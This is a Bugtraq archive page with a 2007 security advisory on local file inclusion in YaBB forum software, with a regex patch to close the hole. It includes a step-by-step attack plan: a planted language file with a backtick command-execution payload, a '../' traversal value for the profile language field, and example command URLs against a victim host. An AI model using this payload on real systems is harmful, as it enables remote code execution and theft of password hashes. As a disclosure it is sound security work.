Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Local File Include Vulnerabilities in YaBB <= 2.1(all version)

From: krasza () gmail com
Date: 19 Jun 2007 13:26:48 -0000
Local File Include Vulnerabilities

Problem: Local File Include Vulnerabilities
Product: YaBB <= 2.1(all version)
Web page:http://www.yabbforum.com/

Credit:Maciej `krasza` Kukla
@mail:krasza () gmail com
homepage:www.krasza.int.pl

1.Description

"YaBB is a leading free forum software package that rivals any professional message board out there. It provides a 
real-time chat and support system for your visitors. While chat programs allow people to talk directly, you have to be 
on at the same time as others. With forum software like YaBB, you can talk any time, and everyone can join in the 
conversation! Build a community and get visitors to come back for interesting discussions, fun chit chat, or needed 
support without having to spend thousands of dollars."

http://www.google.pl/search?q=Powered+by+YaBB => 1,640,000 clients

2. Local File Include

I found many bugs like it in this board.Bugs relate one special variable for user($language, you can edit this variable 
in your profile). Examples, where I found bugs:

---Sources/HelpCentre.pl:139---
if (-e ("$helpfile/$language/$help_area/$line.help")) {
                        require "$helpfile/$language/$help_area/$line.help";
}
---end---

---Sources/Subs.pl:1529---
if (-e "$langdir/$use_lang/$what_to_load.lng") {
        require "$langdir/$use_lang/$what_to_load.lng";
}
---end---

---Sources/ICQPager.pl:21---
if ($language) { require "$langdir/$language/ICQ.lng"; }
---end---

---Sources/Post.pl:1838---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/Post.pl:1863---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/Post.pl:1880---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/InstantMessage.pl:1080---
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/InstantMessage.lng"; }
---end---

---Sources/InstantMessage.pl:1082---
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/Main.lng"; }
---end---

You can set this variable in profile's module.Thanks to uses the "../" characters, You can read other user's 
files(where is hash of password), exec other perl's script(so exec your code) etc.

Example 'plan of attacking' page, where is YaBB's forum(exec your command on server):

        1.Find web, where is YaBB's forum(example 'http://victim.com/~krasza/yabb2/&apos;)
        2.Modify your local's folder 'English' (from YaBB's packet)
                English/HelpCentre.lng
                ---
                %helptxt = (
                '1' => "Help Section",
                '2' => "Contents",
                ---

                change for:

                ---
                $content="<br><br><br><br><font color=red>";
                $content.=`$INFO{'cmd'}`;
                $content.="</font><br><br><br><br>";
                %helptxt = (
                '1' => "Help Section",
                '2' => $content,
                ---

        3.Copy your local's folder 'folder' to your account on attack's server(victim.com)
        4.Create a new user(example 'attacker') on attack's forum(' http://vicitm.com/~krasza/yabb2/&apos;)
        5.Edit your profile and set 'userlangue' on "../../path/your/folder/where/is/English's/folder/"(I propose you 
use 'Tamper Data'-plugin for Firefox);
        6.Go to 'Help' on Yabb's page in your browser ('http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&apos;);
        7.Now Thanks to 'cmd' var, You can exec your command, example:

                http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=whoami returns 'nobody'(red color) on top in 
left frame.
                http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=uname%20-a returns 'Linux thrall 2.4.31 #21 Sun 
Jun 5 19:19:51 PDT 2005 i686 unknown unknown GNU/Linux '
                etc.


3.Exploits:

If you much want to look exploit for this bug, I will can publish my code. I don't prefer  publish my exploits. I 
think, that 'plan of attacking page' should suffice you.


4.Fix:

YaBB must filter language's var in profile's module.Until YaBB company will publish oficial fix, You should edit 
Sources/Profile.pl by this means:

---Sources/Profile.pl:1225---
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@/]+\Z^ && $member{'userlanguage'} ne "") { 
&fatal_error($profile_txt{'815'}); }
---end---

change for:

---Sources/Profile.pl:1225---
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@]+\Z^ && $member{'userlanguage'} ne "") { 
&fatal_error($profile_txt{'815'}); }
---end---

This version will deny injecting slash '/'.



Maciej `krasza` Kukla
krasza () gmail com
www.krasza.int.pl

http://www.krewniacy.pl

-- 
Best regards, Maciej `krasza` Kukla
Previous By Date Next
Previous By Thread Next

Current thread: